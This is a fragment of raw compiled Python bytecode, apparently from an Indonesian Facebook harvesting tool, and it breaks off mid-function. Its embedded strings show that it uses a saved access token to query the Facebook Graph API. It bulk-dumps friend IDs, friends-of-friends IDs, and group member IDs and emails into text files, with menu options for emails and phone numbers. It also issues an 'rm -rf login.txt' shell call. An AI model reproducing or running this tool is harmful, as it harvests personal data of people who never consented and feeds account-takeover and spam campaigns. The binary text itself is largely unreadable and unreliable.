Backs\x03\x00\x00\x00\xe2\x95\x91(\n\x00\x00\x00R\x05\x00\x00\x00R(\x00\x00\x00R)\x00\x00\x00R*\x00\x00\x00R-\x00\x00\x00R\x1c\x00\x00\x00R\x1d\x00\x00\x00R2\x00\x00\x00R.\x00\x00\x00t\n\x00\x00\x00dump_pilih(\x01\x00\x00\x00R4\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x03\x00\x00\x00<s>t\x04\x00\x00\x00dumpf\x01\x00\x00s.\x00\x00\x00\x00\x01\r\x01\x03\x01\x19\x01\r\x01\x05\x01\r\x01\r\x01\x0b\x01\r\x01\x05\x01\x05\x01\x05\x01\x05\x01\x05\x01\x05\x01\x05\x01\x05\x01\x05\x01\x05\x01\x05\x01\x05\x01\x05\x01c\x00\x00\x00\x00\x01\x00\x00\x00\x02\x00\x00\x00C\x00\x00\x00s;\x01\x00\x00t\x00\x00d\x01\x00\x83\x01\x00}\x00\x00|\x00\x00d\x02\x00k\x02\x00r\'\x00d\x03\x00GHt\x01\x00\x83\x00\x00\x01n\x10\x01|\x00\x00d\x04\x00k\x02\x00r=\x00t\x02\x00\x83\x00\x00\x01n\xfa\x00|\x00\x00d\x05\x00k\x02\x00rS\x00t\x03\x00\x83\x00\x00\x01n\xe4\x00|\x00\x00d\x06\x00k\x02\x00r{\x00t\x04\x00j\x05\x00d\x07\x00\x83\x01\x00\x01d\x08\x00GHt\x06\x00\x83\x00\x00\x01n\xbc\x00|\x00\x00d\t\x00k\x02\x00r\x91\x00t\x07\x00\x83\x00\x00\x01n\xa6\x00|\x00\x00d\n\x00k\x02\x00r\xa7\x00t\x08\x00\x83\x00\x00\x01n\x90\x00|\x00\x00d\x0b\x00k\x02\x00r\xbd\x00t\t\x00\x83\x00\x00\x01nz\x00|\x00\x00d\x0c\x00k\x02\x00r\xd3\x00t\n\x00\x83\x00\x00\x01nd\x00|\x00\x00d\r\x00k\x02\x00r\xe9\x00t\x0b\x00\x83\x00\x00\x01nN\x00|\x00\x00d\x0e\x00k\x02\x00r\xff\x00t\x0c\x00\x83\x00\x00\x01n8\x00|\x00\x00d\x0f\x00k\x02\x00r\x15\x01t\r\x00\x83\x00\x00\x01n"\x00|\x00\x00d\x10\x00k\x02\x00r+\x01t\x0e\x00\x83\x00\x00\x01n\x0c\x00d\x03\x00GHt\x01\x00\x83\x00\x00\x01d\x00\x00S(\x11\x00\x00\x00Ns\x1d\x00\x00\x00\x1b[1;97m\xe2\x95\x9a\xe2\x95\x90\x1b[1;91mD \x1b[1;97mR\n\x00\x00\x00s\x16\x00\x00\x00\x1b[1;91m[!] Wrong inputR8\x00\x00\x00R9\x00\x00\x00Rs\x00\x00\x00R&\x00\x00\x00s\r\x00\x00\x00\x1b[1;91mSegeraRt\x00\x00\x00t\x01\x00\x00\x005t\x01\x00\x00\x006t\x01\x00\x00\x007t\x01\x00\x00\x008t\x01\x00\x00\x009t\x02\x00\x00\x0010R:\x00\x00\x00(\x0f\x00\x00\x00R/\x00\x00\x00R\x7f\x00\x00\x00t\x08\x00\x00\x00id_temant\x0c\x00\x00\x00idfrom_temanR\x05\x00\x00\x00R(\x00\x00\x00R\x08\x00\x00\x00t\x0e\x00\x00\x00id_member_grupt\x0e\x00\x00\x00em_member_grupt\x0e\x00\x00\x00no_member_grupR?\x00\x00\x00t\x0f\x00\x00\x00emailfrom_temant\x08\x00\x00\x00nomor_hpt\x0c\x00\x00\x00hpfrom_temanR+\x00\x00\x00(\x01\x00\x00\x00t\x04\x00\x00\x00cuih(\x00\x00\x00\x00(\x00\x00\x00\x00s\x03\x00\x00\x00<s>R\x7f\x00\x00\x00\x7f\x01\x00\x00s<\x00\x00\x00\x00\x01\x0c\x01\x0c\x01\x05\x01\n\x01\x0c\x01\n\x01\x0c\x01\n\x01\x0c\x01\r\x01\x05\x01\n\x01\x0c\x01\n\x01\x0c\x01\n\x01\x0c\x01\n\x01\x0c\x01\n\x01\x0c\x01\n\x01\x0c\x01\n\x01\x0c\x01\n\x01\x0c\x01\n\x02\x05\x01c\x00\x00\x00\x00\x06\x00\x00\x00\x06\x00\x00\x00C\x00\x00\x00sQ\x02\x00\x00t\x00\x00j\x01\x00d\x01\x00\x83\x01\x00\x01y\x19\x00t\x02\x00d\x02\x00d\x03\x00\x83\x02\x00j\x03\x00\x83\x00\x00}\x00\x00Wn7\x00\x04t\x04\x00k\n\x00r_\x00\x01\x01\x01d\x04\x00GHt\x00\x00j\x01\x00d\x05\x00\x83\x01\x00\x01t\x05\x00j\x06\x00d\x06\x00\x83\x01\x00\x01t\x07\x00\x83\x00\x00\x01n\x01\x00Xy\x11\x00t\x00\x00j\x08\x00d\x07\x00\x83\x01\x00\x01Wn\x11\x00\x04t\t\x00k\n\x00r\x84\x00\x01\x01\x01n\x01\x00Xy*\x01t\x00\x00j\x01\x00d\x01\x00\x83\x01\x00\x01t\n\x00GHt\x0b\x00j\x0c\x00d\x08\x00|\x00\x00\x17\x83\x01\x00}\x01\x00t\r\x00j\x0e\x00|\x01\x00j\x0f\x00\x83\x01\x00}\x02\x00t\x10\x00d\t\x00\x83\x01\x00\x01d\n\x00d\x0b\x00\x14GHt\x02\x00d\x0c\x00d\r\x00\x83\x02\x00}\x03\x00xr\x00|\x02\x00d\x0e\x00\x19D]f\x00}\x04\x00t\x11\x00j\x12\x00|\x04\x00d\x0f\x00\x19\x83\x01\x00\x01|\x03\x00j\x13\x00|\x04\x00d\x0f\x00\x19d\x10\x00\x17\x83\x01\x00\x01d\x11\x00t\x14\x00t\x15\x00t\x11\x00\x83\x01\x00\x83\x01\x00\x17d\x12\x00\x17|\x04\x00d\x0f\x00\x19\x17Gt\x16\x00j\x17\x00j\x18\x00\x83\x00\x00\x01t\x05\x00j\x06\x00d\x13\x00\x83\x01\x00\x01q\xec\x00W|\x03\x00j\x19\x00\x83\x00\x00\x01d\x14\x00GHd\x15\x00t\x15\x00t\x11\x00\x83\x01\x00\x16GHt\x1a\x00d\x16\x00\x83\x01\x00}\x05\x00t\x00\x00j\x1b\x00d\x0c\x00d\x17\x00|\x05\x00\x17\x83\x02\x00\x01d\x18\x00|\x05\x00\x17GHt\x1a\x00d\x19\x00\x83\x01\x00\x01t\x1c\x00\x83\x00\x00\x01Wn\x9b\x00\x04t\x04\x00k\n\x00r\xd8\x01\x01\x01\x01d\x1a\x00GHt\x1a\x00d\x19\x00\x83\x01\x00\x01t\x1c\x00\x83\x00\x00\x01nu\x00\x04t\x1d\x00t\x1e\x00f\x02\x00k\n\x00r\x04\x02\x01\x01\x01d\x1b\x00GHt\x1a\x00d\x19\x00\x83\x01\x00\x01t\x1c\x00\x83\x00\x00\x01nI\x00\x04t\x1f\x00k\n\x00r*\x02\x01\x01\x01d\x1c\x00GHt\x1a\x00d\x19\x00\x83\x01\x00\x01t\x1c\x00\x83\x00\x00\x01n#\x00\x04t\x0b\x00j \x00j!\x00k\n\x00rL\x02\x01\x01\x01d\x1d\x00GHt"\x00\x83\x00\x00\x01n\x01\x00Xd\x00\x00S(\x1e\x00\x00\x00NR&\x00\x00\x00s\t\x00\x00\x00login.txtR\'\x00\x00\x00s\x1a\x00\x00\x00\x1b[1;91m[!] Token not founds\x10\x00\x00\x00rm -rf login.txti\x01\x00\x00\x00t\x03\x00\x00\x00outs3\x00\x00\x00https://graph.facebook.com/me/friends?access_token=s0\x00\x00\x00\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mGet all friend id \x1b[1;97m...i*\x00\x00\x00s\n\x00\x00\x00\x1b[1;97m\xe2\x95\x90s\x10\x00\x00\x00out/id_teman.txtR\x11\x00\x00\x00Rl\x00\x00\x00Rj\x00\x00\x00s\x01\x00\x00\x00\ns\x11\x00\x00\x00\r\x1b[1;97m[ \x1b[1;92ms\x1a\x00\x00\x00\x1b[1;97m ]\x1b[1;97m=> \x1b[1;97mg-C\x1c\xeb\xe26\x1a?sB\x00\x00\x00\r\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mSuccessfully get id \x1b[1;97m....s.\x00\x00\x00\r\x1b[1;91m[+] \x1b[1;92mTotal ID \x1b[1;91m: \x1b[1;97m%ss7\x00\x00\x00\r\x1b[1;91m[+] \x1b[1;92mSave file with name\x1b[1;91m :\x1b[1;97m s\x04\x00\x00\x00out/s2\x00\x00\x00\r\x1b[1;91m[+] \x1b[1;92mFile saved \x1b[1;91m: \x1b[1;97mout/s\x1e\x00\x00\x00\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]s\x1e\x00\x00\x00\x1b[1;91m[!] Error creating files\x12\x00\x00\x00\x1b[1;91m[!] Stoppeds\x10\x00\x00\x00\x1b[1;91m[!] Errors\x1a\x00\x00\x00\x1b[1;91m[\xe2\x9c\x96] No connection(#\x00\x00\x00R\x05\x00\x00\x00R(\x00\x00\x00R)\x00\x00\x00R*\x00\x00\x00R-\x00\x00\x00R\x1c\x00\x00\x00R\x1d\x00\x00\x00R2\x00\x00\x00t\x05\x00\x00\x00mkdirt\x07\x00\x00\x00OSErrorR.\x00\x00\x00Rb\x00\x00\x00Rc\x00\x00\x00Rd\x00\x00\x00Re\x00\x00\x00Rf\x00\x00\x00R \x00\x00\x00t\x07\x00\x00\x00idtemant\x06\x00\x00\x00appendR\x19\x00\x00\x00R\x17\x00\x00\x00R\x0e\x00\x00\x00R\x06\x00\x00\x00R\x18\x00\x00\x00R\x1b\x00\x00\x00Rg\x00\x00\x00R/\x00\x00\x00t\x06\x00\x00\x00renameR\x80\x00\x00\x00t\x11\x00\x00\x00KeyboardInterruptt\x08\x00\x00\x00EOFErrorR,\x00\x00\x00Ri\x00\x00\x00R\x01\x00\x00\x00R\x08\x00\x00\x00(\x06\x00\x00\x00R4\x00\x00\x00R\'\x00\x00\x00R\x1e\x00\x00\x00t\x02\x00\x00\x00bzRm\x00\x00\x00t\x04\x00\x00\x00done(\x00\x00\x00\x00(\x00\x00\x00\x00s\x03\x00\x00\x00<s>R\x87\x00\x00\x00\xa1\x01\x00\x00sb\x00\x00\x00\x00\x01\r\x01\x03\x01\x19\x01\r\x01\x05\x01\r\x01\r\x01\x0b\x01\x03\x01\x11\x01\r\x01\x04\x01\x03\x01\r\x01\x05\x01\x13\x01\x12\x01\n\x01\t\x01\x0f\x01\x11\x01\x11\x01\x15\x01 \x00\r\x00\x11\x01\n\x01\x05\x01\x0f\x01\x0c\x01\x14\x01\t\x01\n\x01\x0b\x01\r\x01\x05\x01\n\x01\n\x01\x13\x01\x05\x01\n\x01\n\x01\r\x01\x05\x01\n\x01\n\x01\x13\x01\x05\x01c\x00\x00\x00\x00\t\x00\x00\x00\x06\x00\x00\x00C\x00\x00\x00s\xd1\x02\x00\x00t\x00\x00j\x01\x00d\x01\x00\x83\x01\x00\x01y\x19\x00t\x02\x00d\x02\x00d\x03\x00\x83\x02\x00j\x03\x00\x83\x00\x00}\x00\x00Wn7\x00\x04t\x04\x00k\n\x00r_\x00\x01\x01\x01d\x04\x00GHt\x00\x00j\x01\x00d\x05\x00\x83\x01\x00\x01t\x05\x00j\x06\x00d\x06\x00\x83\x01\x00\x01t\x07\x00\x83\x00\x00\x01n\x01\x00Xy\x11\x00t\x00\x00j\x08\x00d\x07\x00\x83\x01\x00\x01Wn\x11\x00\x04t\t\x00k\n\x00r\x84\x00\x01\x01\x01n\x01\x00Xy\xaa\x01t\x00\x00j\x01\x00d\x01\x00\x83\x01\x00\x01t\n\x00GHt\x0b\x00d\x08\x00\x83\x01\x00}\x01\x00y>\x00t\x0c\x00j\r\x00d\t\x00|\x01\x00\x17d\n\x00\x17|\x00\x00\x17\x83\x01\x00}\x02\x00t\x0e\x00j\x0f\x00|\x02\x00j\x10\x00\x83\x01\x00}\x03\x00d\x0b\x00|\x03\x00d\x0c\x00\x19\x17GHWn\'\x00\x04t\x11\x00k\n\x00r\r\x01\x01\x01\x01d\r\x00GHt\x0b\x00d\x0e\x00\x83\x01\x00\x01t\x12\x00\x83\x00\x00\x01n\x01\x00Xt\x0c\x00j\r\x00d\t\x00|\x01\x00\x17d\x0f\x00\x17|\x00\x00\x17\x83\x01\x00}\x04\x00t\x0e\x00j\x0f\x00|\x04\x00j\x10\x00\x83\x01\x00}\x05\x00t\x13\x00d\x10\x00\x83\x01\x00\x01d\x11\x00d\x12\x00\x14GHt\x02\x00d\x13\x00d\x14\x00\x83\x02\x00}\x06\x00xv\x00|\x05\x00d\x15\x00\x19d\x16\x00\x19D]f\x00}\x07\x00t\x14\x00j\x15\x00|\x07\x00d\x17\x00\x19\x83\x01\x00\x01|\x06\x00j\x16\x00|\x07\x00d\x17\x00\x19d\x18\x00\x17\x83\x01\x00\x01d\x19\x00t\x17\x00t\x18\x00t\x14\x00\x83\x01\x00\x83\x01\x00\x17d\x1a\x00\x17|\x07\x00d\x17\x00\x19\x17Gt\x19\x00j\x1a\x00j\x1b\x00\x83\x00\x00\x01t\x05\x00j\x06\x00d\x1b\x00\x83\x01\x00\x01ql\x01W|\x06\x00j\x1c\x00\x83\x00\x00\x01d\x1c\x00GHd\x1d\x00t\x18\x00t\x14\x00\x83\x01\x00\x16GHt\x0b\x00d\x1e\x00\x83\x01\x00}\x08\x00t\x00\x00j\x1d\x00d\x13\x00d\x1f\x00|\x08\x00\x17\x83\x02\x00\x01d \x00|\x08\x00\x17GHt\x0b\x00d\x0e\x00\x83\x01\x00\x01t\x12\x00\x83\x00\x00\x01Wn\x9b\x00\x04t\x04\x00k\n\x00rX\x02\x01\x01\x01d!\x00GHt\x0b\x00d\x0e\x00\x83\x01\x00\x01t\x12\x00\x83\x00\x00\x01nu\x00\x04t\x1e\x00t\x1f\x00f\x02\x00k\n\x00r\x84\x02\x01\x01\x01d"\x00GHt\x0b\x00d\x0e\x00\x83\x01\x00\x01t\x12\x00\x83\x00\x00\x01nI\x00\x04t\x11\x00k\n\x00r\xaa\x02\x01\x01\x01d#\x00GHt\x0b\x00d\x0e\x00\x83\x01\x00\x01t\x12\x00\x83\x00\x00\x01n#\x00\x04t\x0c\x00j \x00j!\x00k\n\x00r\xcc\x02\x01\x01\x01d$\x00GHt"\x00\x83\x00\x00\x01n\x01\x00Xd\x00\x00S(%\x00\x00\x00NR&\x00\x00\x00s\t\x00\x00\x00login.txtR\'\x00\x00\x00s\x1a\x00\x00\x00\x1b[1;91m[!] Token not founds\x10\x00\x00\x00rm -rf login.txti\x01\x00\x00\x00R\x90\x00\x00\x00s2\x00\x00\x00\x1b[1;91m[+] \x1b[1;92mInput ID friend \x1b[1;91m: \x1b[1;97ms\x1b\x00\x00\x00https://graph.facebook.com/s\x0e\x00\x00\x00?access_token=s7\x00\x00\x00\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mFrom\x1b[1;91m :\x1b[1;97m R0\x00\x00\x00s\x1b\x00\x00\x00\x1b[1;91m[!] Friend not founds\x1e\x00\x00\x00\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]s*\x00\x00\x00?fields=friends.limit(90000)&access_token=s<\x00\x00\x00\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mGet all friend id from friend \x1b[1;97m...i*\x00\x00\x00s\n\x00\x00\x00\x1b[1;97m\xe2\x95\x90s\x1b\x00\x00\x00out/id_teman_from_teman.txtR\x11\x00\x00\x00t\x07\x00\x00\x00friendsRl\x00\x00\x00Rj\x00\x00\x00s\x01\x00\x00\x00\ns\x11\x00\x00\x00\r\x1b[1;97m[ \x1b[1;92ms\x1a\x00\x00\x00\x1b[1;97m ]\x1b[1;97m=> \x1b[1;97mg-C\x1c\xeb\xe26\x1a?sB\x00\x00\x00\r\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mSuccessfully get id \x1b[1;97m....s.\x00\x00\x00\r\x1b[1;91m[+] \x1b[1;92mTotal ID \x1b[1;91m: \x1b[1;97m%ss7\x00\x00\x00\r\x1b[1;91m[+] \x1b[1;92mSave file with name\x1b[1;91m :\x1b[1;97m s\x04\x00\x00\x00out/s2\x00\x00\x00\r\x1b[1;91m[+] \x1b[1;92mFile saved \x1b[1;91m: \x1b[1;97mout/s\x1e\x00\x00\x00\x1b[1;91m[!] Error creating files\x12\x00\x00\x00\x1b[1;91m[!] Stoppeds\x10\x00\x00\x00\x1b[1;91m[!] Errors\x1a\x00\x00\x00\x1b[1;91m[\xe2\x9c\x96] No connection(#\x00\x00\x00R\x05\x00\x00\x00R(\x00\x00\x00R)\x00\x00\x00R*\x00\x00\x00R-\x00\x00\x00R\x1c\x00\x00\x00R\x1d\x00\x00\x00R2\x00\x00\x00R\x91\x00\x00\x00R\x92\x00\x00\x00R.\x00\x00\x00R/\x00\x00\x00Rb\x00\x00\x00Rc\x00\x00\x00Rd\x00\x00\x00Re\x00\x00\x00Rf\x00\x00\x00R,\x00\x00\x00R\x80\x00\x00\x00R \x00\x00\x00t\x0b\x00\x00\x00idfromtemanR\x94\x00\x00\x00R\x19\x00\x00\x00R\x17\x00\x00\x00R\x0e\x00\x00\x00R\x06\x00\x00\x00R\x18\x00\x00\x00R\x1b\x00\x00\x00Rg\x00\x00\x00R\x95\x00\x00\x00R\x96\x00\x00\x00R\x97\x00\x00\x00Ri\x00\x00\x00R\x01\x00\x00\x00R\x08\x00\x00\x00(\t\x00\x00\x00R4\x00\x00\x00t\x03\x00\x00\x00idtt\x03\x00\x00\x00jokt\x02\x00\x00\x00opR\'\x00\x00\x00R\x1e\x00\x00\x00R\x98\x00\x00\x00Rm\x00\x00\x00R\x99\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x03\x00\x00\x00<s>R\x88\x00\x00\x00\xd3\x01\x00\x00st\x00\x00\x00\x00\x01\r\x01\x03\x01\x19\x01\r\x01\x05\x01\r\x01\r\x01\x0b\x01\x03\x01\x11\x01\r\x01\x04\x01\x03\x01\r\x01\x05\x01\x0c\x01\x03\x01\x1b\x01\x12\x01\x11\x01\r\x01\x05\x01\n\x01\x0b\x01\x1b\x01\x12\x01\n\x01\t\x01\x0f\x01\x15\x01\x11\x01\x15\x01 \x00\r\x00\x11\x01\n\x01\x05\x01\x0f\x01\x0c\x01\x14\x01\t\x01\n\x01\x0b\x01\r\x01\x05\x01\n\x01\n\x01\x13\x01\x05\x01\n\x01\n\x01\r\x01\x05\x01\n\x01\n\x01\x13\x01\x05\x01c\x00\x00\x00\x00\t\x00\x00\x00\x06\x00\x00\x00C\x00\x00\x00s\xc0\x02\x00\x00y\x19\x00t\x00\x00d\x01\x00d\x02\x00\x83\x02\x00j\x01\x00\x83\x00\x00}\x00\x00Wn7\x00\x04t\x02\x00k\n\x00rR\x00\x01\x01\x01d\x03\x00GHt\x03\x00j\x04\x00d\x04\x00\x83\x01\x00\x01t\x05\x00j\x06\x00d\x05\x00\x83\x01\x00\x01t\x07\x00\x83\x00\x00\x01n\x01\x00Xy\x11\x00t\x03\x00j\x08\x00d\x06\x00\x83\x01\x00\x01Wn\x11\x00\x04t\t\x00k\n\x00rw\x00\x01\x01\x01n\x01\x00Xy\xa6\x01t\x03\x00j\x04\x00d\x07\x00\x83\x01\x00\x01t\n\x00GHt\x0b\x00d\x08\x00\x83\x01\x00}\x01\x00y>\x00t\x0c\x00j\r\x00d\t\x00|\x01\x00\x17d\n\x00\x17|\x00\x00\x17\x83\x01\x00}\x02\x00t\x0e\x00j\x0f\x00|\x02\x00j\x10\x00\x83\x01\x00}\x03\x00d\x0b\x00|\x03\x00d\x0c\x00\x19\x17GHWn\'\x00\x04t\x11\x00k\n\x00r\x00\x01\x01\x01\x01d\r\x00GHt\x0b\x00d\x0e\x00\x83\x01\x00\x01t\x12\x00\x83\x00\x00\x01n\x01\x00Xt\x13\x00d\x0f\x00\x83\x01\x00\x01d\x10\x00d\x11\x00\x14GHt\x00\x00d\x12\x00d\x13\x00\x83\x02\x00}\x04\x00t\x0c\x00j\r\x00d\x14\x00|\x01\x00\x17d\x15\x00\x17|\x00\x00\x17\x83\x01\x00}\x05\x00t\x0e\x00j\x0f\x00|\x05\x00j\x10\x00\x83\x01\x00}\x06\x00xr\x00|\x06\x00d\x16\x00\x19D]f\x00}\x07\x00t\x14\x00j\x15\x00|\x07\x00d\x17\x00\x19\x83\x01\x00\x01|\x04\x00j\x16\x00|\x07\x00d\x17\x00\x19d\x18\x00\x17\x83\x01\x00\x01d\x19\x00t\x17\x00t\x18\x00t\x14\x00\x83\x01\x00\x83\x01\x00\x17d\x1a\x00\x17|\x07\x00d\x17\x00\x19\x17Gt\x19\x00j\x1a\x00j\x1b\x00\x83\x00\x00\x01t\x05\x00j\x06\x00d\x1b\x00\x83\x01\x00\x01q[\x01W|\x04\x00j\x1c\x00\x83\x00\x00\x01d\x1c\x00GHd\x1d\x00t\x18\x00t\x14\x00\x83\x01\x00\x16GHt\x0b\x00d\x1e\x00\x83\x01\x00}\x08\x00t\x03\x00j\x1d\x00d\x12\x00d\x1f\x00|\x08\x00\x17\x83\x02\x00\x01d \x00|\x08\x00\x17GHt\x0b\x00d\x0e\x00\x83\x01\x00\x01t\x12\x00\x83\x00\x00\x01Wn\x9b\x00\x04t\x02\x00k\n\x00rG\x02\x01\x01\x01d!\x00GHt\x0b\x00d\x0e\x00\x83\x01\x00\x01t\x12\x00\x83\x00\x00\x01nu\x00\x04t\x1e\x00t\x1f\x00f\x02\x00k\n\x00rs\x02\x01\x01\x01d"\x00GHt\x0b\x00d\x0e\x00\x83\x01\x00\x01t\x12\x00\x83\x00\x00\x01nI\x00\x04t\x11\x00k\n\x00r\x99\x02\x01\x01\x01d#\x00GHt\x0b\x00d\x0e\x00\x83\x01\x00\x01t\x12\x00\x83\x00\x00\x01n#\x00\x04t\x0c\x00j \x00j!\x00k\n\x00r\xbb\x02\x01\x01\x01d$\x00GHt"\x00\x83\x00\x00\x01n\x01\x00Xd\x00\x00S(%\x00\x00\x00Ns\t\x00\x00\x00login.txtR\'\x00\x00\x00s\x1a\x00\x00\x00\x1b[1;91m[!] Token not founds\x10\x00\x00\x00rm -rf login.txti\x01\x00\x00\x00R\x90\x00\x00\x00R&\x00\x00\x00s1\x00\x00\x00\x1b[1;91m[+] \x1b[1;92mInput ID group \x1b[1;91m:\x1b[1;97m s%\x00\x00\x00https://graph.facebook.com/group/?id=s\x0e\x00\x00\x00&access_token=s=\x00\x00\x00\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mFrom group \x1b[1;91m:\x1b[1;97m R0\x00\x00\x00s\x1a\x00\x00\x00\x1b[1;91m[!] Group not founds\x1e\x00\x00\x00\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]s2\x00\x00\x00\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mGet group member id \x1b[1;97m...i*\x00\x00\x00s\n\x00\x00\x00\x1b[1;97m\xe2\x95\x90s\x13\x00\x00\x00out/member_grup.txtR\x11\x00\x00\x00s\x1b\x00\x00\x00https://graph.facebook.com/s5\x00\x00\x00/members?fields=name,id&limit=999999999&access_token=Rl\x00\x00\x00Rj\x00\x00\x00s\x01\x00\x00\x00\ns\x11\x00\x00\x00\r\x1b[1;97m[ \x1b[1;92ms\x1a\x00\x00\x00\x1b[1;97m ]\x1b[1;97m=> \x1b[1;97mg-C\x1c\xeb\xe26\x1a?sB\x00\x00\x00\r\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mSuccessfully get id \x1b[1;97m....s.\x00\x00\x00\r\x1b[1;91m[+] \x1b[1;92mTotal ID \x1b[1;91m: \x1b[1;97m%ss7\x00\x00\x00\r\x1b[1;91m[+] \x1b[1;92mSave file with name\x1b[1;91m :\x1b[1;97m s\x04\x00\x00\x00out/s2\x00\x00\x00\r\x1b[1;91m[+] \x1b[1;92mFile saved \x1b[1;91m: \x1b[1;97mout/s\x1e\x00\x00\x00\x1b[1;91m[!] Error creating files\x12\x00\x00\x00\x1b[1;91m[!] Stoppeds\x10\x00\x00\x00\x1b[1;91m[!] Errors\x1a\x00\x00\x00\x1b[1;91m[\xe2\x9c\x96] No connection(#\x00\x00\x00R)\x00\x00\x00R*\x00\x00\x00R-\x00\x00\x00R\x05\x00\x00\x00R(\x00\x00\x00R\x1c\x00\x00\x00R\x1d\x00\x00\x00R2\x00\x00\x00R\x91\x00\x00\x00R\x92\x00\x00\x00R.\x00\x00\x00R/\x00\x00\x00Rb\x00\x00\x00Rc\x00\x00\x00Rd\x00\x00\x00Re\x00\x00\x00Rf\x00\x00\x00R,\x00\x00\x00R\x80\x00\x00\x00R \x00\x00\x00t\x05\x00\x00\x00idmemR\x94\x00\x00\x00R\x19\x00\x00\x00R\x17\x00\x00\x00R\x0e\x00\x00\x00R\x06\x00\x00\x00R\x18\x00\x00\x00R\x1b\x00\x00\x00Rg\x00\x00\x00R\x95\x00\x00\x00R\x96\x00\x00\x00R\x97\x00\x00\x00Ri\x00\x00\x00R\x01\x00\x00\x00R\x08\x00\x00\x00(\t\x00\x00\x00R4\x00\x00\x00Rj\x00\x00\x00R\'\x00\x00\x00t\x03\x00\x00\x00aswR\x98\x00\x00\x00t\x02\x00\x00\x00ret\x01\x00\x00\x00sRm\x00\x00\x00R\x99\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x03\x00\x00\x00<s>R\x89\x00\x00\x00\x0e\x02\x00\x00sr\x00\x00\x00\x00\x01\x03\x01\x19\x01\r\x01\x05\x01\r\x01\r\x01\x0b\x01\x03\x01\x11\x01\r\x01\x04\x01\x03\x01\r\x01\x05\x01\x0c\x01\x03\x01\x1b\x01\x12\x01\x11\x01\r\x01\x05\x01\n\x01\x0b\x01\n\x01\t\x01\x0f\x01\x1b\x01\x12\x01\x11\x01\x11\x01\x15\x01 \x00\r\x00\x11\x01\n\x01\x05\x01\x0f\x01\x0c\x01\x14\x01\t\x01\n\x01\x0b\x01\r\x01\x05\x01\n\x01\n\x01\x13\x01\x05\x01\n\x01\n\x01\r\x01\x05\x01\n\x01\n\x01\x13\x01\x05\x01c\x00\x00\x00\x00\x0b\x00\x00\x00\x06\x00\x00\x00C\x00\x00\x00s"\x03\x00\x00y\x19\x00t\x00\x00d\x01\x00d\x02\x00\x83\x02\x00j\x01\x00\x83\x00\x00}\x00\x00Wn7\x00\x04t\x02\x00k\n\x00rR\x00\x01\x01\x01d\x03\x00GHt\x03\x00j\x04\x00d\x04\x00\x83\x01\x00\x01t\x05\x00j\x06\x00d\x05\x00\x83\x01\x00\x01t\x07\x00\x83\x00\x00\x01n\x01\x00Xy\x11\x00t\x03\x00j\x08\x00d\x06\x00\x83\x01\x00\x01Wn\x11\x00\x04t\t\x00k\n\x00rw\x00\x01\x01\x01n\x01\x00Xy\x08\x02t\x03\x00j\x04\x00d\x07\x00\x83\x01\x00\x01t\n\x00GHt\x0b\x00d\x08\x00\x83\x01\x00}\x01\x00y>\x00t\x0c\x00j\r\x00d\t\x00|\x01\x00\x17d\n\x00\x17|\x00\x00\x17\x83\x01\x00}\x02\x00t\x0e\x00j\x0f\x00|\x02\x00j\x10\x00\x83\x01\x00}\x03\x00d\x0b\x00|\x03\x00d\x0c\x00\x19\x17GHWn\'\x00\x04t\x11\x00k\n\x00r\x00\x01\x01\x01\x01d\r\x00GHt\x0b\x00d\x0e\x00\x83\x01\x00\x01t\x12\x00\x83\x00\x00\x01n\x01\x00Xt\x13\x00d\x0f\x00\x83\x01\x00\x01d\x10\x00d\x11\x00\x14GHt\x00\x00d\x12\x00d\x13\x00\x83\x02\x00}\x04\x00t\x0c\x00j\r\x00d\x14\x00|\x01\x00\x17d\x15\x00\x17|\x00\x00\x17\x83\x01\x00}\x05\x00t\x0e\x00j\x0f\x00|\x05\x00j\x10\x00\x83\x01\x00}\x06\x00x\xcb\x00|\x06\x00d\x16\x00\x19D]\xbf\x00}\x07\x00t\x0c\x00j\r\x00d\x14\x00|\x07\x00d\x17\x00\x19\x17d\x18\x00\x17|\x00\x00\x17\x83\x01\x00}\x08\x00t\x0e\x00j\x0f\x00|\x08\x00j\x10\x00\x83\x01\x00}\t\x00yt\x00t\x14\x00j\x15\x00|\t\x00d\x19\x00\x19\x83\x01\x00\x01|\x04\x00j\x16\x00|\t\x00d\x19\x00\x19d\x1a\x00\x17\x83\x01\x00\x01d\x1b\x00t\x17\x00t\x18\x00t\x14\x00\x83\x01\x00\x83\x01\x00\x17d\x1c\x00\x17|\t\x00d\x19\x00\x19\x17d\x1d\x00\x17|\t\x00d\x0c\x00\x19\x17d\x1a\x00\x17Gt\x19\x00j\x1a\x00j\x1b\x00\x83\x00\x00\x01t\x05\x00j\x06\x00d\x1e\x00\x83\x01\x00\x01Wq[\x01\x04t\x11\x00k\n\x00r\x19\x02\x01\x01\x01q[\x01Xq[\x01W|\x04\x00j\x1c\x00\x83\x00\x00\x01d\x10\x00d\x11\x00\x14GHd\x1f\x00GHd 